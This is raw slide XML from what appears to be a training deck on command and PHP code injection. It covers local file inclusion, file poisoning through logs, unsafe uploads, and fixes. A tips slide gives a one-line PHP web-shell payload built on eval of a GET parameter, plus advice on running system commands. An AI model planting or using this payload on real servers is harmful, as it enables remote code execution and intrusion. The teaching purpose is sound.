                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>), normally used in strings. Putting one of this will often reveal an injection inside a string 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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>backtick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>) and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>dollar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>) are usually reserved characters  that trigger errors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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>escape character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> (\) usually reveals injections inside strings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38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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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627568-05BA-41D4-92B1-5BE86AFACDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612322" y="3722914"/>
            <a:ext cx="4653642" cy="72662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914B61-96C8-4248-BDE0-53560955BFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584176" y="1396093"/>
            <a:ext cx="2424793" cy="30207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4C882-C034-4421-A9FF-A414B3507D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677636" y="1771650"/>
            <a:ext cx="3290206" cy="94705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FB93C4-3266-4C12-B44B-B6152BC39D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947057" y="3077936"/>
            <a:ext cx="2424793" cy="32657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650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4313-DE34-4136-A157-DA50691D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PHP Code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E1DB98-82CF-4BA7-BE8F-2B70232A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B5ACF-D571-4DA9-B7BA-39DF6E686F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Let us focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP code injection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PHP has some additional points of injections other than the eval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431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E052-DF6C-4CDF-9543-145AD1F6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PHP Code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70CE46-4DB1-460F-B706-0D0DDECF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F6C5B-7331-4CCD-BB35-DDDB43EF9E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A common pitfall in PHP is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>statement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It is used to execute other PHP files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Its syntax 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AA167DC-6059-49F9-B61D-12789A02B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448" y="2968337"/>
            <a:ext cx="4143103" cy="166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1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7BB2-1020-4318-B376-8BF06978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PHP Code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A39E0C-FECA-4544-91CE-92F2DE43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C77BA-9891-4AAC-ABBC-5F52DB36977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If user supplied input is directly passed to the include statement, an attacker would be able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execute arbitrary PHP files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on the filesystem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And sometimes, include remote files. But this behavior is disabled by default for security reason¹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We call this type of injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>local file inclusion (LFI)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D261B5-4260-4127-81B0-40EA65F8D43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762102" y="4352151"/>
            <a:ext cx="5110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1:https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2389572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2F5F-855A-4329-AA65-CDB9EF8C4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PHP Code Injection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823328-863C-46CB-B8B0-BFE14EF3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E6154-FB7A-40E0-B445-2FC4C1D8AC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92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In order to execute arbitrary code, we need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>inject PHP code on some file on the remote server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP code is delimited by the tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> &lt;?php …  ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If these tags are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allowed/not sanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> code injection can be successful, and there are two main ways to do so:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>file upload functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to upload a file containing some PHP code, and then include it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>File poisoning 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167836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ED3D-7036-442B-B471-439E2CEE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PHP Code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88AB19-189E-4F0E-9FB0-BA7926A32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DD209B-E8AD-43F4-9A6F-50255ADF4D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92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>file poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> happens when an user can write some data in a file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This can happen in many ways, but two common ones are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>System logs:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> applications often implement some kind of logging. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Nginx/Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>logs are generally not readable by PHP, and custom logs are often used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Local database / caching files: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if the application stores user information inside a local file, it is possible to inject some PHP code on it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2033949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CEC7-BB8E-456D-914B-7F7781CB6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PHP Code Injection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CB75E3-FB20-4192-8842-8C9EBE3B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ECA08-44C5-4D7B-9A76-564501ADA7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Another way to execute PHP code, is to put a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>  file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> inside a remote web directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This can happen when some files uploaded by the user are saved on an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>executable directory without enforcing a name or an extension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DCED3E0-5B95-4385-9696-9F390B0F2CB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166034" y="3886200"/>
            <a:ext cx="4977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/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>….Or when the application does it in an unsafe way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7601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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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627568-05BA-41D4-92B1-5BE86AFACDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612322" y="4065814"/>
            <a:ext cx="4653642" cy="38372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914B61-96C8-4248-BDE0-53560955BFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945123" y="1388573"/>
            <a:ext cx="2424793" cy="24944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4C882-C034-4421-A9FF-A414B3507D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636815" y="1763486"/>
            <a:ext cx="3265713" cy="95522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FB93C4-3266-4C12-B44B-B6152BC39D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947057" y="3077936"/>
            <a:ext cx="2629404" cy="65979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5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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33128156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A8D6-6EAA-479A-8C5B-4C6177B5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"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips &amp; Tricks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E093B2-8AF1-4B4C-A197-EC7785E2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AD53-3E98-4AAD-BDE6-FF8D4C6132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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>When dealing with file poisoning/file upload, keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>payload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b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as simple as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Try to use a payload that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allows to execute arbitrary code, not commands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Many times </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>system-related functions are disabled/limited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, so do not waste time trying to guess what functions are disabled or not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latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;?php eval($_GET['c']); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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1251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A9F79-E087-4929-964A-98B47DAE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"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips &amp; Tricks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5FDFDC-043A-4F90-9822-0D78D1BD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D76BE-2FED-4372-B887-64167E0518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Then list every enabled function..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>..and If you find that you can use system commands, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>use them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>!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It is easier to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> than coding a custom PHP function for directory listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1365511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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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914B61-96C8-4248-BDE0-53560955BFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546578" y="1396093"/>
            <a:ext cx="2424793" cy="30207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4C882-C034-4421-A9FF-A414B3507D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1738993"/>
            <a:ext cx="3339192" cy="137976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FB93C4-3266-4C12-B44B-B6152BC39D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947057" y="3077936"/>
            <a:ext cx="2849335" cy="98787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717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C3269-F530-4F76-B21D-50E52AD6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Fixes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54291-0523-454F-9C17-75CFB7C6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A18E3-464B-4B70-A693-DAE2606EDF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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Rule</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Avoid supplying user input to system functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Avoid generating code based on user input</a:t>
            </a:r>
          </a:p>
          <a:p>
